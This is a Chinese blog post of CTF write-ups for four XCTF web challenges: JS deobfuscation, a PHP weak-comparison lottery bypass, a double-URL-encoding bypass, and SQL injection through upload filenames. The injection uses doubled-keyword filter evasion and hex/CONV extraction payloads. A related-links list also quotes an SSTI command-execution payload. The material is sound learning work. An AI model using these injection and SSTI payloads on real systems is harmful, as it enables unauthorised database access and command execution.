web 攻防世界2

最新推荐文章于 2023-09-04 22:12:35 发布
最新推荐文章于 2023-09-04 22:12:35 发布
阅读量262 收藏
点赞数 1
分类专栏: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43741181/article/details/101031525
版权

1.NaNNaNNaNNaN-Batman

打开题目提示下载一个附件,下载为一个文件,记事本打开

有地方乱码了,这里看到<script>标签,用浏览器打开看会不会弹出来

打开之后是一个输入框,输入什么都没用,再去看看文件

这里第一段是给 _ 赋了一个函数,_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg{e_0iit\'_ns=[t,n,r,i];for(o=0;o<13;++o){    [0]);.splice(0,1)}}}    \'
 最后发现了一个eval函数,它没执行$函数。这里用alert代替,弹出了源码

整理一下

function $(){
var e=document.getElementById("c").value;
if(e.length==16)
   if(e.match(/^be0f23/)!=null)
      if(e.match(/233ac/)!=null)
         if(e.match(/e98aa$/)!=null)
             if(e.match(/c7be9/)!=null){
             var t=["fl","s_a","i","e}"];
             var n=["a","_h0l","n"];
             var r=["g{","e","_0"];
             var i=["it'","_","n"];
             var s=[t,n,r,i];
             for(var o=0;o<13;++o){
             document.write(s[o%4][0]);s[o%4].splice(0,1)}
             }
}
document.write('<input id="c"><button οnclick=$()>Ok</button>');
delete _
判断一下这里的正则,^为首,$为尾。

即为be0f233ac7be98aa,把alert改为eval,输入即得。

 

  2.攻防世界 lottery

题目打开先浏览了一下各个网页作用,发现

大概就是需要得到这么多钱来买flag,而方式是猜对彩票的数值。

下载下提供的源码后,发现robots.txt中

即提示git源码泄露,但这里题目给了源代码,审计过后发现判断函数在api.php中

发现flag条件

这里需要做手脚了让输入的数与随机数相等, 这里用==判断,即bool型,可以和任何数据弱类型相等,

抓包改包

把七位数都变为true,执行,发现钱数已经改变

不够就再来一次...

买到了flag

这种题真是好有意思,学到了。

3.攻防世界upload

注册先,邮箱啥的就1@.1这种就可以判断成功了,发现上传按钮

我试着传了一张照片上去,成功了,试试直接传个木马看看,不得行,抓包看看,题目好像被搞了....

路径也找不到,搞不动.....

这竟然是个注入题..大佬是说注入点在文件名上,意思这里文件名连接到数据库,

当输入文件名为注入语句时,发现并没有反应,且出现上传成功,
尝试多次发现过滤的时select和from,所以利用selselectect和frfromom进行绕过,

这里用到了CONV,substr,hex,
不转成数字,完全没有回显结果,所以用hex先将字符转换成16进制,然后用CONV函数将16进制转化为10进制,依次获取子串的12位,用substr截取12是因为一旦过长,会用科学计数法表示

数据库payload:1'+(selselectect CONV(substr(hex(dAtaBase()),1,12),16,10))+'.jpg

得到后转成16进制,再hex

第二部分为

1'+(selselectect CONV(substr(hex(dAtaBase()),13,12),16,10))+'.jpg

解码得到

即数据库为web_upload

接下来爆表,列

1’+(selselectect CONV(substr(hex((selecselectt group_concat(table_name) frofromm information_schema.tables where table_schema=‘web_upload’)),1,12),16,10))+’.jpg

这里从1变到37才完,发现表为

hello_flag_is_here

继续爆列

1’+(selselectect CONV(substr(hex((selecselectt group_concat(column_name) frofromm information_schema.columns where table_name=‘hello_flag_is_here’)),1,12),16,10))+’.jpg
1-13

发现为 i_am_flag

爆字段即可

1’+(selselectect CONV(substr(hex((selecselectt i_am_flag frofromm hello_flag_is_here)),1,12),16,10))+’.jpg

1-25

!!_@m_Th.e_F!lag

直接提交即可,注意在构造sql语句中的双写。

4.攻防世界PHP2

这题刚进来就难住了...

各种尝试无果,看了wp发现源码在index.phps中。。。

读一下代码,第一步判断id===admin的话直接退出,判断成功则判断urldecode后的id和传入的id是否相同

这里考察了一个知识点,在你向浏览器后台传数据时,会将你提交除数字外的先进行一次urldecode,而这个函数又自己进行一次urldecode,

则这里需要传入admin编码后再次编码的值,只需编第一位即可

a -> %61-> %2561

传入%2561即可。

 

 

 

 

 

 

 

 

 

 

 

c3g07f
关注
专栏目录
【网络安全 | CTF】攻防世界 web2 解题详析
等风来
05-25 3769
可通过逆向加密算法的步骤,对 $miwen 进行相反的操作,即先使用 str_rot13 还原,然后使用 strrev 翻转,再使用 base64 解码,最后对每个字符的 ASCII 值减 1 ,再进行翻转即可得到 flag。其中,str_rot13 是一个简单的字符替换算法,将每个字符替换为它在字母表中向后移动 13 位后对应的字符。这个算法是一种经典的简单加密方法,可以用来隐藏字符串的真实含义。这段代码定义了一个函数 encode,接受一个字符串参数 $str,并返回对其进行加密后的结果。
攻防世界easy_web之SSTI注入
m0_66935689的博客
07-29 316
昨天不是放假了嘛想着做几道题的刚好碰到个文件上传的条件竞争整半天头都整大了,网上搜了一下文章质量都参差不齐像我这种菜狗根本看不懂没办法花了两个金币看官方的writeup但还没研究明白就想着做一下其它题把那两个金币挣回来就刚好碰到这玩意。str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串。随便试了一下确定了这玩意会把我们输入的参数当作html解析。
攻防世界 | WEB2
weixin_47982238的博客
10-14 263
先来看一下代码 <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); // echo $_o; for($_0=0;$_0<strlen($_o);$_0++){ $_c=substr($_o,$_0,1); //substr()函数返回
攻防世界web2 (逆向加密算法)
一醉一休的博客
02-23 780
一、web2(攻防世界) 1)很直接就是给出代码 <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); //反转字符串 该函数将字符串逆过来 for($_0=0;$_0<strlen($_o);$_0++){ //循环字符串长度 ...
攻防世界-Web-web2
uh_eng的博客
08-25 264
0x01 <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); // echo $_o; for($_0=0;$_0<strlen($_o);$_0++){ $_c=substr($_o,$_0,1); $__=ord($_c
攻防世界web2
windcandy的博客
11-13 428
攻防世界web2的wp
攻防世界—-(web进阶)FlatScience–WP
12-14
在这个“攻防世界—-(web进阶)FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界 web高手进阶区 10分题 Guess
闵行小鱼塘
11-03 1379
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是Guess的writeup
(ctf)攻防世界web模块020web2
weixin_46035615的博客
05-04 2013
题目 首先来到给定的地址 题意很明确$miwen是加密之后的字符串,我们只需要逆向解密出miwen就能得到flag 我们先来代码审计 $_o=strrev($str); strrev()函数是字符串的倒置 for($_0=0;$_0<strlen($_o);$_0++) for循环,从零开始循环字符串的长度次 $_c=substr($_o,$_0,1); $__=ord($_c)+1; $_c=chr($__); $_=$_.$
攻防世界-web-web2
wuh2333的博客
06-21 163
攻防世界web2
攻防世界 web2
qq_53105813的博客
10-07 1148
攻防世界 wp
攻防世界web2
qq_44111753的博客
11-17 242
题目: WP: 代码审计 <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); // echo $_o; for($_0=0;$_0<strlen($_o);$_0++){ $_c=substr($_o,$_0,1); $_
攻防世界-WEB2
陈艺秋的博客
07-11 672
然后,通过 ord() 函数获取 $_c 字符的 ASCII 值,并+ 1,然后利用chr()函数,将数据转换为字符后重新赋值给$c。循环结束后,将 $_ 变量进行base64编码,然后再利用strrev函数倒序,最后使用ROT13 编码,return返回最终值。接着使用一个for循环,接着,遍历 $_o 中的每个字符。设定临时参数$_0初值为0,退出条件为。将接收的变量利用strrev函数进行字符串反转,并赋值给$_o。将$_c 存储的字符追加到 $_ 变量中。表示下标的字符,存储在 $_c 变量中。
攻防世界-web2
最新发布
weixin_49539962的博客
09-04 262
miwen应该是密文的拼音。在函数encode中,传入字符串str,依次将str中的每一个字符转换为十进制ASCII码加一,然后再转换成字符。
攻防世界 web(二)
未完成的歌~的博客
10-05 531
这周接着刷攻防世界web题( ̄︶ ̄)↗  1、command_execution 2、simple_php 3、NaNNaNNaNNaN-Batman 4、NewsCenter
攻防世界-web2 (NSCTF-WEB)
路baby的博客
07-12 2121
今天在做题无疑发现有个比较有意思(被多个平台收录过) 非常适合编码,web,密码初学者 所以今天就把这道题给你们详细整理出来
web | CTF】攻防世界web2
weixin_46301214的博客
05-23 758
本题考点 - 熟悉PHP函数使用 - 检测你的编程基础是否扎实 步骤一:阅读源码,并分析 打开就有源码,且有提示是逆向算法题 分析后得出加密过程: 原文->字符反转->循环加ascii码后还原拼接->base64加密->字符反转->rot13加密 #不懂PHP函数的自己去查,找个在线PHP刷一下就懂了 步骤二:编写程序,并打印flag 编程程序,逆向解密 过程如下: rot13解密->字符反转->...
[wp] 攻防世界-web2
MercyLin的博客
09-07 940
进来就是代码审计: <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); // echo $_o; for($_0=0;$_0<strlen($_o)...
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值